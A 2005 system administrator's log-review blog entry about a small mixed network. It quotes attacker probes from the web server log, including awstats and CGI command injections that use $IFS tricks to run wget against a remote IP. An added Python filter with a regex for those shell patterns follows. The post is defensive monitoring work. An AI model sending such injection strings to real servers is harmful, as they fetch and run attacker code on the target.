SYSMGR

We're a bunch of computers: Diana, Daphne, and Dido, called the 3D-cluster, running OpenVMS; Io, running OpenVMS as well (in some obscure role in the network); Aphrodite, Athene and Irene, running WindowsXP-Pro (SP2, of course); and Cerberus at the edge of the network, with Charon, also running Linux, as standby. SYSMGR takes care of us.

Wednesday, December 14

14-Dec-2005

System management
There are new Windows updates available, so I updated Hera and Athene, and defragmented the disks. This caused Hera to malfunction on reboot, but just once. Networked processing on Athene keeps giving hicks and ticks...

Security (web)
Checked the web access log on Diana - the main one, that is. The last cycle was in August, so it's time to take a look. Checked for CONNECT, found two (failed, of course) and POST. There, I found my own ones, of course, sending mail from elsewhere using webmail, but some unwanted addresses as well - warning me what to care for. I still have to dig into the following addresses, which tried to GET or POST things I do not have on the system - at the moment:

According to the timing (not given), these all must have run scripts. Except, perhaps, for one:

POST /_vti_bin/_vti_aut/author.dll

The rest contain one or more of the following:

GET /path/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20...
POST /path/xmlrpc.php
GET /path/includer.cgi?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244...
GET /path/hints.pl?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lup...
GET /path/webhints.pl?cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lup...

in a number of paths and formats. I guess the address on awstats access is 62.101.193.244 as well, or something in that range.
I still have to fully investigate all addresses and strings since my view was just 132 characters, but I'm warned (and others as well, I hope) before installation!
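
Added example, not part of the original post: a small Python filter for the checks described above (CONNECT, requests for the probed scripts, and shell syntax in query strings) that reads each log line in full rather than through a 132-character view. It assumes Common Log Format, which the post does not state, and the sample lines and addresses are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumption: Common Log Format; the post does not say what format Diana's server writes.
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>[^:\]]+)[^\]]*\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# Resources the post lists as probed; "hints.pl" also matches webhints.pl.
PROBED = ("/_vti_bin/", "xmlrpc.php", "awstats.pl", "includer.cgi", "hints.pl")
# Shell syntax that has no business in a query string (checked after URL-decoding).
SHELL = re.compile(r"\$IFS|`|\bwget\b|;\s*(?:cd|echo)\b", re.I)

def classify(method, target):
    """Return the reasons a request looks like one of the probes in the post."""
    path, _, query = target.partition("?")
    reasons = []
    if method == "CONNECT":
        reasons.append("proxy-connect")
    if any(p in path for p in PROBED):  # a plain POST (e.g. own webmail) is not flagged
        reasons.append("probed-script")
    if SHELL.search(unquote(query)):
        reasons.append("shell-in-query")
    return reasons

def scan(lines):
    """Map (day, client address) -> sorted reasons, reading each line in full."""
    hits = defaultdict(set)
    for line in lines:
        m = CLF.match(line)
        if m:
            hits[(m["day"], m["ip"])].update(classify(m["method"], m["target"]))
    return {k: sorted(v) for k, v in hits.items() if v}

# Constructed sample lines; addresses are documentation ranges, request strings are
# abbreviated from the ones quoted in the post.
SAMPLE = [
    '192.0.2.10 - - [10/Nov/2005:03:12:01 +0100] "GET /path/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%20... HTTP/1.0" 404 210',
    '198.51.100.7 - - [12/Nov/2005:11:40:22 +0100] "POST /path/xmlrpc.php HTTP/1.0" 404 210',
    '198.51.100.7 - - [12/Nov/2005:11:40:23 +0100] "GET /path/hints.pl?cd$IFS/tmp;wget$IFS... HTTP/1.0" 404 210',
    '203.0.113.5 - - [13/Nov/2005:08:00:00 +0100] "CONNECT mail.example.net:25 HTTP/1.0" 403 0',
    '203.0.113.9 - - [13/Nov/2005:09:15:00 +0100] "POST /webmail/send HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for (day, ip), reasons in scan(SAMPLE).items():
        print(day, ip, ", ".join(reasons))
```

The output is one line per day and client address, so repeat visitors on different days stand out without scrolling the raw log.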

Security (mail)
Just a few, today:

14-DEC-2005 02:48:16.21 CLNTINRBL 24.177.139.8
14-DEC-2005 02:48:56.62 CLNTINRBL 85.169.44.48
14-DEC-2005 02:49:01.26 CLNTINRBL 222.48.36.84
14-DEC-2005 14:10:13.58 NOSPAMRLY 221.140.55.86 smtphunter22@daum.net
14-DEC-2005 17:59:06.66 CLNTINRBL 81.57.1.48
